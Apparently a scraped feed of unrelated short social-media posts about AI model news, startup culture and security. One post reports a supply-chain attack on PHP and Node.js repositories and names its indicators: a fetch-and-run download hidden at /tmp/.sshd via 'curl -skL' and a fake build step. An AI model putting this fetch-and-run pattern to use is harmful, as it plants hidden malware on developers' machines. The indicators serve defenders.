Now patiently waiting for the ITAR/EAR version of Fable/Mythos

Who’s going to write my emails now? 😭

As a result of a US government directive, we are suspending access to Claude Fable 5 for all users. You can continue to use all other Claude models. Here’s what this means for you: Across Claude products, new sessions will run on your selected default model or Opus 4.8, and existing Fable 5 sessions will end with an error. On the Claude Platform, requests to Fable 5 will also return an error. Please update your integrations to other Claude models. We know this is a disruption to your workflows; we appreciate your patience and support.

‼️🚨 BREAKING: Another supply chain attack. 700 GitHub repositories flagged, including PHP and Node.js projects. The malicious script was planted across all of them. When a developer installs the package, the script silently downloads a Linux file from GitHub, hides it under the name /tmp/.sshd (so it looks like a normal system file), and runs it in the background. It also skips security checks on the download and hides any error messages. 8 PHP packages on Packagist (the main PHP code library) were confirmed infected. The attacker hid the script inside a JavaScript config file (package.json) instead of the PHP one (composer.json), so PHP developers reviewing their code would not notice it. The biggest risk is to devdojo/wave (6,400 stars) and devdojo/genesis (9,100 installs), both popular Laravel project templates. Developers who use these templates run the bad script the moment they install dependencies. The same payload was also dropped into GitHub Actions (automated build pipelines) under a fake step called "Dependency Cache Sync," meaning it could infect company build servers too. Packagist removed the bad packages, but the auto-updating versions (dev-main, dev-master, 3.x-dev) can quietly come back if the original repos stay infected. IOCs: GitHub account parikhpreyash4 repo systemd-network-helper-aa5c751f drop path /tmp/.sshd command fragments curl -skL and chmod x /tmp/.sshd.

Endpoint security and knowing what’s installed on your device is more important than ever. Managing risk means controlling the flow of data into and out of your boundary, whether that’s your browser, IDE, VPS, SaaS, AI agent, or endpoint device. BRB while I reformat all of our computers 🙂‍↔️

Wow. Goodbye supply chain security. Time to move to air-gapped repositories and CI/CD.

Modern Threat Modeling 101 Tip: Before Mythos came out we warned everyone to go into turtle mode in case your late to the game (get everything off the internet as possible). In case your super late to the game, get your employee SaaS apps off the internet. Almost all SaaS has SP-Initiated authentication built in to the implementation. Moreover, attackers are going to find authentication "bypasses" much easier now. SP-initiated authentication makes the SaaS enumerable from the internet for easy targeting. Now is not the time to have things on the internet. MFA will not save you. We left that era a couple years ago. You should be behind your SASE/ZTNA solution's dedicated IPs. If you are not requiring managed assets to access cloud resources, rhat means your cloud resources are accessible from the internet. Understand now?

Today is a hard day. I shared this note with the @linear team today: We’ve made the difficult decision to increase our workforce. This is not a cost-cutting exercise or a reflection of anyone’s performance. We’re simply reimagining every role for the agentic AI era. We’re hiring. We’re sorry about that.

Had this exact conversation today!

Man I know exactly how. I don't need links. My constraint is time not capability.

Skills.md issue

Kids in 2025: "SIX... SEVEN!!" 🗣️ @claudeai in 2026: "For your 6-7 agent setup..." Even @AnthropicAI got the bug 😂

Made a Claudegotchi app that lives off of code commits and a 3js Pikachu that lives on my desktop and celebrates with every new commit 😂

Second time in 3 months that I jump on a zoom call and we both happen to be a 2 minute walk from each other in SF and decide to meet IRL instead! SF = Serendipity Found!

This is so true! The flywheel of success gets amplified and accelerated so much faster, especially if your roommates are also founders and in VC in SF

Compounding isn’t just for capital. It’s for reputation, relationships, and craft. Play long games.

I asked @MayaKaczorowski (former Senior Director @github) about her thoughts about GitHub's identity system. Personally I think managing identity in GitHub is clear as mud.

Best coworking spots in SF that are open weekends?